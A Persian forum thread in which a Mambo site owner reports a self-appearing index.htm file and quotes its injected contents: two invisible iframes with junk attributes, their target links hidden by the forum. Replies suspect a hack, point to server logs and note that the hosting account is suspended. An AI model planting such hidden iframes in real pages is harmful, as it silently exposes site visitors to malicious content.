-
یه مشکل عجیب (ساخته شدن فایل index.htm به صورت خود به خودی در
با سلام خدمت دوستان من حدود 12 روزه که مامبو رو نصب کردم و سایتم رو از نظر محتوایی دارم کامل می کنم ولی یه مشکل عجیب دیدم:
چند روز پیش وقتی تو آدرس بار IE ادرس سایتم رو وارد کردم یه صفحه کاملا سفید می یومد.رفتم فایل های Public_html رو چک کردم دیدم یه فایل index.htm به صورت خود به خود اونجا ظاهر شده! به هر حال گفتم شاید تصادفی باشه و پاکش کردم.
امروز دوباره دیدم ظاهر شده و یه نگاهی بهش انداختم و این کدها رو تو این فایل دیدم:
<iframe kuopx='NkltjIS2' mlxtr='BMW0tm8l' lpwso='QSkUr6GX' kmhph='qYGEyXXW' dbcok='R1GO4ypK' src='[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] ' wdhpk='g3ys6f9U' gsdsb='jaUufndy' bwomc='I4szeBBt' vreko='Pra6OhvJ' xmdno='N9jTO4Rq' width='205' height='349' style='display:none'></iframe>
<iframe kuopx='NkltjIS2' mlxtr='BMW0tm8l' lpwso='QSkUr6GX' kmhph='qYGEyXXW' dbcok='R1GO4ypK' src='[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] ' wdhpk='g3ys6f9U' gsdsb='jaUufndy' bwomc='I4szeBBt' vreko='Pra6OhvJ' xmdno='N9jTO4Rq' width='205' height='349' style='display:none'></iframe>
اگه دقت کنید اینو میبینید: '[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] من نمی دونم دقیقا چه اتفاقی داره میوفته .اساتید محترم و دوستان راهنمایی کنند؟
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
-
06-10-2008 07:02 PM
# ADS
تبلیغات در جوملا فارسی
-
پاسخ : یه مشکل عجیب (ساخته شدن فایل index.htm به صورت خود به خ
خوب فعلا که کلا ساسپند شدید!
This Account Has Been Suspended For Violation Of Hosting Terms And Conditions
Please contact the billing/support department as soon as possible.
-
-
سلام
من فکر کنم بوی هک میاد ;D
آقا سیامک فکر کنم اون سایته آدرس سایت هکر محترم بوده قبلنا
فکر کنما نه؟ آدرس سایت خودته؟
به هاستینگ گفتی؟
یا علی علیه السلام
-
-
من که گفتم اون کدها داخل فایل ایندکسی بود که خود به خود ساخته شده بود.و اون آدرس ، آدرس سایت من نیست که شما فرمودید Suspend شده! اول متن تاپیکو خوب بخونید بعد جواب بدید اگه چیزی نمی دونی هم بزار یکی دیگه که می دونه جواب بده!
فکر کنم باید ماژول هایی که از mambo-digg دانلودکردم و رو سایتم نصب کردم رو یه بررسی کنم یه بوهایی می یاد!
-
-
دوست عزیز سلام !
تمام ماژولهای mambo-digg تست میشن و بعد برای دانلود منتشر میشن !
پیشنهاد میکنم وقت خودتون رو برای چک امنیت سرور و باقی مسائل بذارید ... و یا لاگها رو بررسی کنید تا متوجه بشید این فایل چطور ساخته شده !
یا علی
-
-
دوست گرامی جناب فیروزمندان
من روی همین سرور که امنیت نداره! 4 تا سایت دیگه دارم که جند ساله فعال هستندو از پرتالهای دیگه ای تو اونها استفاده می کنم.به اندازه کافی به سرور خودم اطمینان دارم .
و اولین باره که مامبو رو روی این هاست جدیدم که از همون سرور همیشگیم هستش نصب می کنم.
اگه میشه منو راهنمایی کنین تا مشکل ببینیم چیه نه اینکه بگیم سرور امنیت نداره!
-
-
ما کاری با امنیت شما نداریم هر طوری می خواد باشه در حد پیشنهاد هست و گوش زدی به شما !
دوما ! که فرمودیم که همه ی اکستنش های درون مامبو دیگ تست میشه و بارها و بارها نصب شده بدون مشکل
سوما اگر الان چیزی اضافه شده در روی هاست می تونید از لاگ ها استفاده کنید ومشکل رو راحتت تر بیابید ما که دسترسی به لاک ها نداریم !!
پس لطفا لاگ های سرور رو بررسی کنید
و در آخر عزیزم
این یعنی اینکه سایت شما رو سرورتون بسته و ما که معلومه نمی بینمیش پس با سرور این یکی رو حل کنید من همه رو هم خوندم از بالا تا پایین رفتم توی سایت
نوشته پس یعنی سرور شما رو سسپند کرده !
یاعلی
-
-
[quote author=abimanager link=topic=14087.msg74849#msg74849 date=1213199542]
دوست گرامی جناب فیروزمندان
من روی همین سرور که امنیت نداره! 4 تا سایت دیگه دارم که جند ساله فعال هستندو از پرتالهای دیگه ای تو اونها استفاده می کنم.به اندازه کافی به سرور خودم اطمینان دارم .
و اولین باره که مامبو رو روی این هاست جدیدم که از همون سرور همیشگیم هستش نصب می کنم.
اگه میشه منو راهنمایی کنین تا مشکل ببینیم چیه نه اینکه بگیم سرور امنیت نداره!
[/quote]
دوست عزیز
اینکه 4 تا سایت روی یک سرور باشن و هیچ وقت مشکلی نداشته باشن دلیل مناسبی برای داشتن امنیت نیست. خود من یک هاست ریسلر تستی دارم که امنیتش صفره ولی تا حالا هم هک نشده و مشکلی نداشته! ولی میدونم اگر کسی 10 دقیقه وقت بزاره هکش میکنه ....
با این اوصاف، من خدمتتون توضیح دادم که هاست شما ساسپند شده. لطفا با مدیریت سرور تماس بگیرید تا بفهمید چرا ساسپند شده.
-
علاقه مندی ها (Bookmarks)